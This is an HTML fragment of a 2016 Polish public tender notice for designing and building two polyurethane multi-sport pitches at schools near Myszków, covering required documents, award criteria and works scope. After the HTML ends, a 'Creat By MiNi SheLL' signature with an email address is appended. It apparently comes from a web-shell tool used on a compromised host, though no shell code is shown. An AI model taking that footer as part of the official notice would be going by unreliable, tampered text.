na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty. Ww. wykaz stanowi załącznik nr 5 do SIWZ;
2)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usług oraz za kierowanie robotami budowlanymi  wraz z informacjami na temat ich uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją 
o podstawie do dysponowania tymi osobami, stanowiącego załącznik nr 6 do SIWZ.
3)	informacja banku lub spółdzielczej kasy oszczędnościowo  kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców 
- oświadczenie Wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego,  składa każdy z Wykonawców wspólnie ubiegających się 
o zamówienie;
2)	Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, zamieszcza informacje o tych podmiotach w tym oświadczeniu.
3)W odniesieniu do podmiotów na zasoby których Wykonawca powołuje się przy wykazywaniu spełniania warunków udziału w postępowaniu, Wykonawca przedkłada dokumenty wymienione w § 5 pkt 1 - 9 Rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U. z 2016r . poz. 1126), tj.:
1)	informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez Zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że podmiot, o którym mowa w art. 22a ustawy Pzp, zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że podmiot, o którym mowa w art. 22a ustawy Pzp, zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp;
5)	oświadczenie podmiotu, o którym mowa w art. 22a ustawy Pzp, o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
6)	oświadczenie podmiotu, o którym mowa w art. 22a ustawy Pzp, o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;
7)	oświadczenie podmiotu, o którym mowa w art. 22a ustawy Pzp, o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym przez Zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy Pzp;
8)	oświadczenie podmiotu, o którym mowa w art. 22a ustawy Pzp, o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez Zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy Pzp;
9)	oświadczenie podmiotu, o którym mowa w art. 22a ustawy Pzp, o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716).
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>	Okres gwarancji na wykonane roboty budowlane</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy, w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy  w związku z:
1)	zmianą stawki podatku VAT wg zasad opisanych w § 11 ust. 15 umowy;
2)	zmiany terminu wykonania przedmiotu umowy spowodowanego:
a)	udokumentowanym wstrzymaniem robót budowlanych prowadzonych przez Wykonawcę z powodu kolizji jego prac z pracami prowadzonymi przez zarządców sieci  wydłużenie terminu wykonania przedmiotu umowy o okres wstrzymania robót, 
b)	brakiem technologicznej możliwości prowadzenia robót na skutek udokumentowanych niekorzystnych warunków atmosferycznych  wydłużenie terminu wykonania przedmiotu umowy o okres występowania niekorzystnych warunków atmosferycznych dla prowadzenia robót budowlanych,
c)	działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego  wydłużenie terminu wykonania przedmiotu umowy o okres występowania niekorzystnych warunków atmosferycznych dla prowadzenia robót budowlanych,
d)	wstrzymaniem prac budowlanych przez Zamawiającego lub właściwy organ z przyczyn niezawinionych przez Wykonawcę  wydłużenie terminu wykonania przedmiotu umowy o okres wstrzymania robót.
3.	Nie stanowią zmian umowy w rozumieniu art. 144 ustawy zmiany:
1)	formalno-organizacyjne,
2)	danych związanych z obsługą administracyjno-organizacyjną umowy,
3)	danych teleadresowych,
4)	przedstawicieli stron umowy odpowiedzialnych za jej realizację,
- które następują poprzez pisemne zgłoszenie tego faktu drugiej stronie umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 26/10/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Budowa boiska wielofunkcyjnego o nawierzchni poliuretanowej na terenie placu szkolnego przy ul. Jedwabnej. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia, w ramach budżetu partycypacyjnego, w formule zaprojektuj i wybuduj jest wykonanie prac projektowych i robót budowlanych, polegających na wybudowaniu (częściowo) ogrodzonego boiska do gry w siatkówkę o nawierzchni poliuretanowej wraz z jego wyposażeniem, budową komunikacji i elementów małej architektury.
Dla ww. zakresu robót budowlanych Wykonawca winien opracować niezbędną dokumentację projektową oraz uzyskać wymagane uzgodnienia i pozwolenia. 
Dokumentacja projektowa powinna zostać opracowana zgodnie z:
­	Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 
25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 poz. 462 z późn. zm.),
­	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego 
(jednolity tekst Dz. U. z Dz. U. z 2013 poz. 1129), 
­	Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. Nr 120 z 2003r., poz. 1126) i innymi obowiązującymi przepisami. 
Przy projektowaniu i budowie boiska należy bezwzględnie zaplanować rozmieszczenie linii przy uwzględnieniu wymaganych stref bezpieczeństwa. Przedmiot zamówienia bezwzględnie należy dostosować do potrzeb wszystkich użytkowników, w tym zapewnić dostępność obiektu dla osób niepełnosprawnych (brak barier architektonicznych 
w postaci krawężników, obrzeży itp.). W koncepcji planu zagospodarowania  załącznik nr 3/pfu zaproponowano, aby komunikację o szerokości ok. 2m, dla zapewnienia dostępności obiektu dla osób niepełnosprawnych, połączyć z projektowanym w ramach termomodernizacji szkoły układem komunikacyjnym. 
Zakres zadań będących przedmiotem zamówienia obejmuje:
1)	Budowę boiska do gry w siatkówkę o nawierzchni na bazie żywic poliuretanowych do gry w siatkówkę o powierzchni ok. 360 m2 wraz z wyposażeniem;
2)	Wykonanie ogrodzenia o długości ok. 61,50 mb o wysokości czterech metrów;
3)	Budowę komunikacji  ok. 3,70 m2;
4)	Wykonanie prac agrotechnicznych:
a)	wyrównanie przyległego terenu,
b)	zasianie trawy.
Zakres planowanych prac projektowych:
1)	Uzyskanie mapy dla celów opiniodawczych,
2)	Uzyskanie oświadczeń, opinii, uzgodnień i innych dokumentów, niezbędnych do wykonania dokumentacji projektowej,
3)	Opracowanie dokumentacji projektowej w zakresie niezbędnym do zgłoszenia budowy w Starostwie Powiatowym w Myszkowie,
4)	Skuteczne zgłoszenie budowy w Starostwie Powiatowym w Myszkowie, 
tj. niewniesienie sprzeciwu w ustawowym terminie przez organ przyjmujący zgłoszenie,
5)	Uzupełnienie dokumentacji projektowej i opracowanie STWiOR w zakresie niezbędnym do zrealizowania zadania inwestycyjnego, tj. wynikającym z programu funkcjonalno-użytkowego, 
6)	Wykonanie dokumentacji powykonawczej  w tym inwentaryzacji geodezyjnej powykonawczej i dokumentacji budowlanej powykonawczej.
Zakres planowanych robót budowlanych:
1)	Roboty ziemne:
a)	korytowanie pod podbudowę nawierzchni,
b)	wykopy pod słupy ogrodzenia boiska,
c)	wykopy pod fundamenty urządzeń sportowych,
d)	wywóz i utylizacja odpadów oraz nadmiaru ziemi,
2)	Niwelacja terenu, usunięcie karpin,
3)	Wykonanie robót budowlanych na podstawie sporządzonej i zatwierdzonej dokumentacji projektowej,
4)	Wybudowanie boiska do gry w siatkówkę o nawierzchni poliuretanowej, 
5)	Wykonanie ogrodzenia boiska z trzech stron, 
6)	Wyposażenie boiska w urządzenia niezbędne dla jego obsługi,
7)	Wykonanie zagospodarowania terenu:
a)	komunikacji w celu połączenia obiektu z planowanymi w ramach termomodernizacji ciągami komunikacyjnymi, 
b)	elementów małej architektury, 
8)	Prace agrotechniczne i ukształtowanie terenu:
a)	wyrównanie przyległego terenu, 
b)	zasianie trawy,
9)	Utylizacja materiałów rozbiórkowych i innych odpadów z terenu budowy. 
Szczegółowy zakres przedmiotu zamówienia określony został w programie funkcjonalno
 użytkowym stanowiącym załącznik nr 1 do SIWZ.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45212220-4, 71320000-7,
                    45100000-8,
                    45111291-4,
                    45111200-0,
                    45340000-2,
                    71248000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 16/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>	Okres gwarancji na wykonane roboty budowlane</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Budowa boiska wielofunkcyjnego przy Zespole Szkół Publicznych nr 2.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Opis przedmiotu zamówienia dla części 2:
Przedmiotem zamówienia, w ramach budżetu partycypacyjnego, w formule zaprojektuj i wybuduj jest wykonanie prac projektowych i robót budowlanych, polegających na wybudowaniu boiska wielofunkcyjnego o nawierzchni poliuretanowej w miejscu istniejącego boiska do gry w koszykówkę o nawierzchni asfaltowej. 
Dla ww. zakresu robót budowlanych Wykonawca winien opracować niezbędną dokumentację projektową oraz uzyskać wymagane uzgodnienia i pozwolenia. 
Dokumentacja projektowa powinna zostać opracowana zgodnie z:
­	Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 
25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 poz. 462 z późn. zm.),
­	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego 
(jednolity tekst Dz. U. z  2013r., poz. 1129), 
­	Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. Nr 120 z 2003r., poz. 1126) i innymi obowiązującymi przepisami.
Przedmiot zamówienia bezwzględnie należy dostosować do potrzeb wszystkich użytkowników, w tym zapewnić dostępność obiektu dla osób niepełnosprawnych (brak barier architektonicznych w postaci krawężników, obrzeży itp.)
Zakres zadań będących przedmiotem zamówienia obejmuje:
Budowę boiska wielofunkcyjnego o nawierzchni poliuretanowej o wymiarach 15x28m bez wyposażenia;
Zakres planowanych prac projektowych:
1)	Uzyskanie mapy dla celów opiniodawczych,
2)	Uzyskanie oświadczeń, opinii, uzgodnień i innych dokumentów, niezbędnych do wykonania dokumentacji projektowej,
3)	Opracowanie dokumentacji projektowej w zakresie niezbędnym do zgłoszenia wykonywania robót w Starostwie Powiatowym w Myszkowie,
4)	Skuteczne zgłoszenie wykonywania robót w Starostwie Powiatowym w Myszkowie, 
tj. niewniesienie sprzeciwu w ustawowym terminie przez organ przyjmujący zgłoszenie,
5)	Uzupełnienie dokumentacji projektowej i opracowanie STWiOR w zakresie niezbędnym do zrealizowania zadania inwestycyjnego , tj. wynikającym  z programu funkcjonalno-użytkowego. 
Zakres planowanych robót budowlanych:
1)	rozbiórka istniejącej nawierzchni asfaltowej i podbudowy tłuczniowej boiska do koszykówki na powierzchni ok. 420m2 (precyzyjne cięcie piłą wykonywane na całym obwodzie istniejącego boiska do gry w piłkę koszykową).
2)	wyznaczenie położenia obiektu,
3)	zabezpieczenie placu budowy,
4)	zabezpieczenie krawędzi istniejącej nawierzchni asfaltowej w miejscu planowanego połączenia z nawierzchnią poliuretanową i ewentualna ich naprawa w przypadku uszkodzenia krawędzi przy prowadzeniu robót budowlanych polegających na korytowaniu pod warstwy konstrukcyjne nawierzchni poliuretanowej;
5)	korytowanie pod warstwy konstrukcyjne nowej nawierzchni poliuretanowej boiska wielofunkcyjnego,
6)	wykonanie warstwy filtracyjnej z piasku i podbudowy tłuczniowej o gr. ok. 35cm,
7)	wykonanie podłoża pod nawierzchnię poliuretanową z podkładu mineralno  syntetycznego o gr. ok. 35mm,
8)	wykonanie nawierzchni poliuretanowej składającej się z pośredniej, nośnej warstwy elastycznej o gr. ok. 11mm i zewnętrznej warstwy użytkowej o gr. ok. 2mm,
9)	wykonanie drenażu francuskiego (kruszywo zabezpieczone geowłókniną) na odcinku od południowo  wschodniego narożnika boiska w kierunku pasa zieleni przylegającego do południowej części boiska (ok. 15mb), 
10)	rozbiórka i odtworzenie nawierzchni asfaltowej w miejscu przebiegu drenażu francuskiego na długości ok. 15mb,
11)	 wykonanie na terenie zieleni przylegającym do południowej części boiska zbiornika z kręgów betonowych fi 1200 i głębokości 120cm z górną płytą żelbetową 
i przekryciem włazem betonowym, z podłączeniem do studni drenażu francuskiego,
12)	utylizacja materiałów rozbiórkowych i innych odpadów z terenu budowy.
Szczegółowy zakres przedmiotu zamówienia określony został w programie funkcjonalno 
 użytkowym stanowiącym załącznik nr 2 do SIWZ.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45212220-4, 71320000-7,
                    45100000-8,
                    45111291-4,
                    45111200-0,
                    71248000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 16/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>	Okres gwarancji na wykonane roboty budowlane</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com